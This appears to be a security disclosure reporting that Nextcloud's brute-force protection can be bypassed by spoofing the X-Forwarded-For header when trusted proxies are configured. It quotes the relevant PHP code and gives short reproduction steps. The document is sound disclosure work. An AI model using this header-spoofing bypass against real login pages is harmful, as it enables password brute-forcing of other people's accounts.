Nextcloud: Bruteforce protection in password verification can be bypassed

Summary:

nextcloud server have implemented IP address-based blocking as a measure to counter Bruteforce protection.
The source IP address is obtained through the getRemoteAddress() function.

lib/public/IRequest.php

	public function getRemoteAddress(): string {
		$remoteAddress = isset($this->server['REMOTE_ADDR']) ? $this->server['REMOTE_ADDR'] : '';
		$trustedProxies = $this->config->getSystemValue('trusted_proxies', []);

		if (\is_array($trustedProxies) && $this->isTrustedProxy($trustedProxies, $remoteAddress)) {
			$forwardedForHeaders = $this->config->getSystemValue('forwarded_for_headers', [
				'HTTP_X_FORWARDED_FOR'
				// only have one default, so we cannot ship an insecure product out of the box
			]);

			foreach ($forwardedForHeaders as $header) {
				if (isset($this->server[$header])) {
					foreach (explode(',', $this->server[$header]) as $IP) {
						$IP = trim($IP);

						// remove brackets from IPv6 addresses
						if (str_starts_with($IP, '[') && str_ends_with($IP, ']')) {
							$IP = substr($IP, 1, -1);
						}

						if (filter_var($IP, FILTER_VALIDATE_IP) !== false) {
							return $IP;
						}
					}
				}
			}
		}

It is determined that the IP address is retrieved based on the value of the X-Forwarded-For header when trusted_proxy is configured.

By adding the X-Forwarded-For header with valid ip format it is possible to bypass Bruteforce protection.

Step to reproduce

1. Setting up a nextcloud server using trusted_proxy.
2. Attempts to log in multiple times with incorrect passwords. Confirm that the Throttler\sleepDelay function causes a delay in response time.
3. Add X-Forwarded-For header with valid ip format, the the delay is eliminated and Bruteforce protection is bypassed.

Impact

an attacker can bypass bruteforce protection and bruteforce the login.